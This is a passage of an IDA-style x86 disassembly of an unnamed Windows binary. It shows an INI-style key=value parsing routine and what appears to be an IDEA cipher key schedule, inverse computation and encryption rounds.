mov [ebp+var_74], eax
loc_501E91: ; CODE XREF: sub_501CC4+1C5�j
mov eax, [ebp+var_74]
mov ecx, [ebp+var_4C]
lea eax, [ecx+eax+1]
mov [ebp+var_44], eax
loc_501E9E: ; CODE XREF: sub_501CC4+1A0�j
jmp short loc_501EBA
; ---------------------------------------------------------------------------
loc_501EA0: ; CODE XREF: sub_501CC4+179�j
push [ebp+var_30]
push [ebp+arg_0]
call ds:dword_5117C0 ; lstrcmpi
test eax, eax
jnz short loc_501EB6
mov [ebp+var_48], 1
jmp short loc_501EBA
; ---------------------------------------------------------------------------
loc_501EB6: ; CODE XREF: sub_501CC4+1EA�j
and [ebp+var_48], 0
loc_501EBA: ; CODE XREF: sub_501CC4+16B�j
; sub_501CC4:loc_501E9E�j ...
jmp loc_502184
; ---------------------------------------------------------------------------
loc_501EBF: ; CODE XREF: sub_501CC4+15B�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_501ED5
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_501EEC
loc_501ED5: ; CODE XREF: sub_501CC4+204�j
cmp [ebp+var_24], 1
jnz short loc_501EE0
jmp loc_501E25
; ---------------------------------------------------------------------------
loc_501EE0: ; CODE XREF: sub_501CC4+215�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_3C], eax
jmp loc_502184
; ---------------------------------------------------------------------------
loc_501EEC: ; CODE XREF: sub_501CC4+20F�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 3Dh
jnz loc_502184
cmp [ebp+arg_0], 0
jz loc_502151
mov eax, [ebp+var_38]
mov byte ptr [eax], 20h
loc_501F0B: ; CODE XREF: sub_501CC4+266�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax-1]
cmp eax, 9
jz short loc_501F23
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax-1]
cmp eax, 20h
jnz short loc_501F2C
loc_501F23: ; CODE XREF: sub_501CC4+251�j
mov eax, [ebp+var_38]
dec eax
mov [ebp+var_38], eax
jmp short loc_501F0B
; ---------------------------------------------------------------------------
loc_501F2C: ; CODE XREF: sub_501CC4+25D�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
loc_501F39: ; CODE XREF: sub_501CC4+292�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 9
jz short loc_501F4F
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_501F58
loc_501F4F: ; CODE XREF: sub_501CC4+27E�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_501F39
; ---------------------------------------------------------------------------
loc_501F58: ; CODE XREF: sub_501CC4+289�j
cmp [ebp+arg_4], 0
jnz loc_5020A1
movzx eax, [ebp+var_48]
test eax, eax
jz loc_50209C
mov eax, [ebp+var_44]
mov [ebp+var_58], eax
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_60], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_58]
mov [ebp+var_6C], eax
mov eax, [ebp+var_6C]
cmp eax, [ebp+var_60]
jge short loc_501F9F
mov eax, [ebp+var_6C]
mov [ebp+var_78], eax
jmp short loc_501FA5
; ---------------------------------------------------------------------------
loc_501F9F: ; CODE XREF: sub_501CC4+2D1�j
mov eax, [ebp+var_60]
mov [ebp+var_78], eax
loc_501FA5: ; CODE XREF: sub_501CC4+2D9�j
mov eax, [ebp+var_78]
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jle short loc_501FD4
mov ecx, [ebp+var_5C]
mov esi, [ebp+var_3C]
mov edi, [ebp+arg_C]
add edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_58]
add eax, [ebp+var_5C]
mov [ebp+var_58], eax
loc_501FD4: ; CODE XREF: sub_501CC4+2EB�j
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
loc_501FDA: ; CODE XREF: sub_501CC4+33C�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_502002
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_502002
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_502002
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_501FDA
; ---------------------------------------------------------------------------
loc_502002: ; CODE XREF: sub_501CC4+31D�j
; sub_501CC4+328�j ...
movzx eax, [ebp+arg_18]
test eax, eax
jz loc_50208E
mov eax, [ebp+arg_10]
dec eax
dec eax
cmp [ebp+var_58], eax
jnb short loc_502028
mov eax, [ebp+arg_C]
add eax, [ebp+var_58]
mov byte ptr [eax], 3Dh
mov eax, [ebp+var_58]
inc eax
mov [ebp+var_58], eax
loc_502028: ; CODE XREF: sub_501CC4+352�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_60], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_58]
mov [ebp+var_70], eax
mov eax, [ebp+var_70]
cmp eax, [ebp+var_60]
jge short loc_502059
mov eax, [ebp+var_70]
mov [ebp+var_7C], eax
jmp short loc_50205F
; ---------------------------------------------------------------------------
loc_502059: ; CODE XREF: sub_501CC4+38B�j
mov eax, [ebp+var_60]
mov [ebp+var_7C], eax
loc_50205F: ; CODE XREF: sub_501CC4+393�j
mov eax, [ebp+var_7C]
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jle short loc_50208E
mov ecx, [ebp+var_5C]
mov esi, [ebp+var_3C]
mov edi, [ebp+arg_C]
add edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_58]
add eax, [ebp+var_5C]
mov [ebp+var_58], eax
loc_50208E: ; CODE XREF: sub_501CC4+344�j
; sub_501CC4+3A5�j
mov eax, [ebp+var_58]
inc eax
mov [ebp+var_44], eax
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_3C], eax
loc_50209C: ; CODE XREF: sub_501CC4+2A4�j
jmp loc_50214F
; ---------------------------------------------------------------------------
loc_5020A1: ; CODE XREF: sub_501CC4+298�j
push [ebp+var_3C]
push [ebp+arg_4]
call ds:dword_5117C0 ; lstrcmpi
test eax, eax
jnz short loc_50211C
movzx eax, [ebp+var_48]
test eax, eax
jz short loc_50211C
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
loc_5020BF: ; CODE XREF: sub_501CC4+421�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_5020E7
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_5020E7
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_5020E7
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_5020BF
; ---------------------------------------------------------------------------
loc_5020E7: ; CODE XREF: sub_501CC4+402�j
; sub_501CC4+40D�j ...
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov eax, [ebp+arg_10]
dec eax
push eax
push [ebp+var_3C]
push [ebp+arg_C]
call sub_4FC770
add esp, 0Ch
mov eax, [ebp+arg_C]
add eax, [ebp+arg_10]
and byte ptr [eax-1], 0
mov edi, [ebp+arg_C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_44], ecx
jmp short loc_502189
; ---------------------------------------------------------------------------
loc_50211C: ; CODE XREF: sub_501CC4+3EB�j
; sub_501CC4+3F3�j ...
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_502144
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_502144
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_502144
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_50211C
; ---------------------------------------------------------------------------
loc_502144: ; CODE XREF: sub_501CC4+45F�j
; sub_501CC4+46A�j ...
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
jmp loc_501DB9
; ---------------------------------------------------------------------------
loc_50214F: ; CODE XREF: sub_501CC4:loc_50209C�j
jmp short loc_502184
; ---------------------------------------------------------------------------
loc_502151: ; CODE XREF: sub_501CC4+23B�j
; sub_501CC4+4B3�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_502179
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_502179
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_502179
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_502151
; ---------------------------------------------------------------------------
loc_502179: ; CODE XREF: sub_501CC4+494�j
; sub_501CC4+49F�j ...
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
jmp loc_501DB9
; ---------------------------------------------------------------------------
loc_502184: ; CODE XREF: sub_501CC4+14D�j
; sub_501CC4:loc_501EBA�j ...
jmp loc_501DA6
; ---------------------------------------------------------------------------
loc_502189: ; CODE XREF: sub_501CC4+EF�j
; sub_501CC4+12F�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_502194
jmp short loc_5021B6
sub_501CC4 endp
; =============== S U B R O U T I N E =======================================
sub_502194 proc near ; CODE XREF: sub_501CC4+4C9�p
; DATA XREF: _6:0050E400�o
mov eax, [ebp-34h]
mov [ebp-68h], eax
push dword ptr [ebp-68h]
call sub_5083DD
pop ecx
cmp dword ptr [ebp-2Ch], 0FFFFFFFFh
jz short locret_5021B5
lea eax, [ebp-1Ch]
push eax
push dword ptr [ebp-2Ch]
call sub_500741
locret_5021B5: ; CODE XREF: sub_502194+13�j
retn
sub_502194 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_501CC4
loc_5021B6: ; CODE XREF: sub_501CC4+4CE�j
mov eax, [ebp+var_44]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_501CC4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
push dword ptr [ebp-4]
push dword ptr [ebp+8]
mov ecx, [ebp-4]
call sub_5021F3
mov eax, [ebp-4]
add eax, 68h
push eax
push dword ptr [ebp-4]
mov ecx, [ebp-4]
call sub_50229B
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5021F3 proc near ; CODE XREF: _5:005021D8�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
and [ebp+var_8], 0
jmp short loc_502209
; ---------------------------------------------------------------------------
loc_502202: ; CODE XREF: sub_5021F3+40�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_502209: ; CODE XREF: sub_5021F3+D�j
cmp [ebp+var_8], 8
jge short loc_502235
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
shl eax, 8
mov ecx, [ebp+arg_0]
movzx ecx, byte ptr [ecx+1]
add eax, ecx
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_4]
mov [edx+ecx*2], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
jmp short loc_502202
; ---------------------------------------------------------------------------
loc_502235: ; CODE XREF: sub_5021F3+1A�j
and [ebp+var_4], 0
jmp short loc_502242
; ---------------------------------------------------------------------------
loc_50223B: ; CODE XREF: sub_5021F3+A2�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_502242: ; CODE XREF: sub_5021F3+46�j
cmp [ebp+var_8], 34h
jge short locret_502297
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, 7
mov ecx, [ebp+arg_4]
movzx eax, word ptr [ecx+eax*2]
shl eax, 9
mov ecx, [ebp+var_4]
inc ecx
and ecx, 7
mov edx, [ebp+arg_4]
movzx ecx, word ptr [edx+ecx*2]
sar ecx, 7
or eax, ecx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_4]
mov [edx+ecx*2+0Eh], ax
mov eax, [ebp+var_4]
and eax, 8
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*2]
mov [ebp+arg_4], eax
mov eax, [ebp+var_4]
and eax, 7
mov [ebp+var_4], eax
jmp short loc_50223B
; ---------------------------------------------------------------------------
locret_502297: ; CODE XREF: sub_5021F3+53�j
leave
retn 8
sub_5021F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50229B proc near ; CODE XREF: _5:005021EA�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = word ptr -7Ch
var_78 = dword ptr -78h
var_74 = word ptr -74h
var_70 = word ptr -70h
var_6C = word ptr -6Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 98h
push esi
push edi
mov [ebp+var_80], ecx
lea eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_84], ax
push [ebp+var_84]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_50259C
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_88], ax
push [ebp+var_88]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_50259C
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
and [ebp+var_78], 0
jmp short loc_502372
; ---------------------------------------------------------------------------
loc_50236B: ; CODE XREF: sub_50229B+1D7�j
mov eax, [ebp+var_78]
inc eax
mov [ebp+var_78], eax
loc_502372: ; CODE XREF: sub_50229B+CE�j
cmp [ebp+var_78], 7
jge loc_502477
mov eax, [ebp+arg_0]
mov ax, [eax]
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov cx, [ecx]
mov [eax], cx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_8C], ax
push [ebp+var_8C]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_50259C
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_90], ax
push [ebp+var_90]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_50259C
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
jmp loc_50236B
; ---------------------------------------------------------------------------
loc_502477: ; CODE XREF: sub_50229B+DB�j
mov eax, [ebp+arg_0]
mov ax, [eax]
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov cx, [ecx]
mov [eax], cx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_94], ax
push [ebp+var_94]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_50259C
mov [ebp+var_70], ax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_74], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
neg eax
mov [ebp+var_7C], ax
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_0]
mov ax, [eax]
mov word ptr [ebp+var_98], ax
push [ebp+var_98]
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov ecx, [ebp+var_80]
call sub_50259C
mov ecx, [ebp+var_4]
dec ecx
dec ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
mov [ecx], ax
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_7C]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_74]
mov [eax], cx
mov eax, [ebp+var_4]
dec eax
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov cx, [ebp+var_70]
mov [eax], cx
push 1Ah
pop ecx
lea esi, [ebp+var_6C]
mov edi, [ebp+arg_4]
rep movsd
and [ebp+var_78], 0
jmp short loc_502585
; ---------------------------------------------------------------------------
loc_50257E: ; CODE XREF: sub_50229B+2F9�j
mov eax, [ebp+var_78]
inc eax
mov [ebp+var_78], eax
loc_502585: ; CODE XREF: sub_50229B+2E1�j
cmp [ebp+var_78], 34h
jge short loc_502596
mov eax, [ebp+var_78]
and [ebp+eax*2+var_6C], 0
jmp short loc_50257E
; ---------------------------------------------------------------------------
loc_502596: ; CODE XREF: sub_50229B+2EE�j
pop edi
pop esi
leave
retn 8
sub_50229B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50259C proc near ; CODE XREF: sub_50229B+32�p
; sub_50229B+81�p ...
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_C = word ptr -0Ch
var_8 = word ptr -8
var_4 = word ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], ecx
movzx eax, [ebp+arg_0]
cmp eax, 1
jg short loc_5025B7
mov ax, [ebp+arg_0]
jmp locret_50268F
; ---------------------------------------------------------------------------
loc_5025B7: ; CODE XREF: sub_50259C+10�j
movzx ecx, [ebp+arg_0]
mov eax, 10001h
cdq
idiv ecx
mov [ebp+var_C], ax
movzx ecx, [ebp+arg_0]
mov eax, 10001h
cdq
idiv ecx
mov [ebp+var_10], dx
movzx eax, [ebp+var_10]
cmp eax, 1
jnz short loc_5025F7
movzx eax, [ebp+var_C]
push 1
pop ecx
sub ecx, eax
and ecx, 0FFFFh
mov ax, cx
jmp locret_50268F
; ---------------------------------------------------------------------------
loc_5025F7: ; CODE XREF: sub_50259C+42�j
mov [ebp+var_8], 1
loc_5025FD: ; CODE XREF: sub_50259C+DF�j
movzx eax, [ebp+arg_0]
movzx ecx, [ebp+var_10]
cdq
idiv ecx
mov [ebp+var_4], ax
movzx eax, [ebp+arg_0]
movzx ecx, [ebp+var_10]
cdq
idiv ecx
mov [ebp+arg_0], dx
movzx eax, [ebp+var_4]
movzx ecx, [ebp+var_C]
imul eax, ecx
mov cx, [ebp+var_8]
add cx, ax
mov [ebp+var_8], cx
movzx eax, [ebp+arg_0]
cmp eax, 1
jnz short loc_502640
mov ax, [ebp+var_8]
jmp short locret_50268F
; ---------------------------------------------------------------------------
loc_502640: ; CODE XREF: sub_50259C+9C�j
movzx eax, [ebp+var_10]
movzx ecx, [ebp+arg_0]
cdq
idiv ecx
mov [ebp+var_4], ax
movzx eax, [ebp+var_10]
movzx ecx, [ebp+arg_0]
cdq
idiv ecx
mov [ebp+var_10], dx
movzx eax, [ebp+var_4]
movzx ecx, [ebp+var_8]
imul eax, ecx
mov cx, [ebp+var_C]
add cx, ax
mov [ebp+var_C], cx
movzx eax, [ebp+var_10]
cmp eax, 1
jnz short loc_5025FD
movzx eax, [ebp+var_C]
push 1
pop ecx
sub ecx, eax
and ecx, 0FFFFh
mov ax, cx
locret_50268F: ; CODE XREF: sub_50259C+16�j
; sub_50259C+56�j ...
leave
retn 4
sub_50259C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp+8]
mov [ebp-4], eax
and dword ptr [ebp-8], 0
jmp short loc_5026AF
; ---------------------------------------------------------------------------
loc_5026A8: ; CODE XREF: _5:005026D1�j
mov eax, [ebp-8]
inc eax
mov [ebp-8], eax
loc_5026AF: ; CODE XREF: _5:005026A6�j
mov eax, [ebp-8]
cmp eax, [ebp+0Ch]
jge short locret_5026D3
push dword ptr [ebp-0Ch]
push dword ptr [ebp-4]
push dword ptr [ebp-4]
mov ecx, [ebp-0Ch]
call sub_5026D7
mov eax, [ebp-4]
add eax, 8
mov [ebp-4], eax
jmp short loc_5026A8
; ---------------------------------------------------------------------------
locret_5026D3: ; CODE XREF: _5:005026B5�j
leave
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5026D7 proc near ; CODE XREF: _5:005026C3�p _5:00502D36�p
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_28 = word ptr -28h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1C = word ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_10 = word ptr -10h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 48h
push ebx
mov [ebp+var_30], ecx
mov [ebp+var_4], 8
mov eax, [ebp+arg_0]
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_1C], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_20], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_28], ax
mov eax, [ebp+var_18]
inc eax
inc eax
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov ax, [eax]
mov [ebp+var_2C], ax
movzx eax, [ebp+var_1C]
sar eax, 8
movzx ecx, [ebp+var_1C]
shl ecx, 8
or eax, ecx
mov [ebp+var_1C], ax
movzx eax, [ebp+var_20]
sar eax, 8
movzx ecx, [ebp+var_20]
shl ecx, 8
or eax, ecx
mov [ebp+var_20], ax
movzx eax, [ebp+var_28]
sar eax, 8
movzx ecx, [ebp+var_28]
shl ecx, 8
or eax, ecx
mov [ebp+var_28], ax
movzx eax, [ebp+var_2C]
sar eax, 8
movzx ecx, [ebp+var_2C]
shl ecx, 8
or eax, ecx
mov [ebp+var_2C], ax
loc_50277E: ; CODE XREF: sub_5026D7+41E�j
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_50281D
movzx eax, [ebp+var_1C]
and eax, 0FFFFh
mov [ebp+var_1C], ax
movzx eax, [ebp+var_1C]
test eax, eax
jz short loc_5027FE
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_1C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_1C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_1C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_1C], ax
mov ax, [ebp+var_1C]
mov [ebp+var_32], ax
jmp short loc_502813
; ---------------------------------------------------------------------------
loc_5027FE: ; CODE XREF: sub_5026D7+D8�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_32], ax
loc_502813: ; CODE XREF: sub_5026D7+125�j
mov ax, [ebp+var_32]
mov [ebp+var_34], ax
jmp short loc_502832
; ---------------------------------------------------------------------------
loc_50281D: ; CODE XREF: sub_5026D7+BF�j
movzx eax, [ebp+var_1C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_1C], cx
mov ax, [ebp+var_1C]
mov [ebp+var_34], ax
loc_502832: ; CODE XREF: sub_5026D7+144�j
mov eax, [ebp+arg_8]
mov cx, [ebp+var_20]
add cx, [eax]
mov [ebp+var_20], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov cx, [ebp+var_28]
add cx, [eax]
mov [ebp+var_28], cx
mov eax, [ebp+arg_8]
inc eax
inc eax
mov [ebp+arg_8], eax
mov eax, [ebp+arg_8]
mov ax, [eax]
mov [ebp+var_10], ax
movzx eax, [ebp+var_10]
mov ecx, [ebp+arg_8]
inc ecx
inc ecx
mov [ebp+arg_8], ecx
test eax, eax
jz loc_5028FD
movzx eax, [ebp+var_2C]
and eax, 0FFFFh
mov [ebp+var_2C], ax
movzx eax, [ebp+var_2C]
test eax, eax
jz short loc_5028DE
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
imul eax, ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
and eax, 0FFFFh
mov [ebp+var_2C], ax
mov eax, [ebp+var_24]
shr eax, 10h
mov [ebp+var_10], ax
movzx eax, [ebp+var_2C]
movzx ecx, [ebp+var_10]
sub eax, ecx
movzx ecx, [ebp+var_2C]
movzx edx, [ebp+var_10]
xor ebx, ebx
cmp ecx, edx
setl bl
add eax, ebx
mov [ebp+var_2C], ax
mov ax, [ebp+var_2C]
mov [ebp+var_36], ax
jmp short loc_5028F3
; ---------------------------------------------------------------------------
loc_5028DE: ; CODE XREF: sub_5026D7+1B8�j
movzx eax, [ebp+var_10]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_36], ax
loc_5028F3: ; CODE XREF: sub_5026D7+205�j
mov ax, [ebp+var_36]
mov [ebp+var_38], ax
jmp short loc_502912
; ---------------------------------------------------------------------------
loc_5028FD: ; CODE XREF: sub_5026D7+19F�j
movzx eax, [ebp+var_2C]
push 1
pop ecx
sub ecx, eax
mov [ebp+var_2C], cx
mov ax, [ebp+var_2C]
mov [ebp+var_38], ax
loc_502912: ; CODE XREF: sub_5026D7+224�j
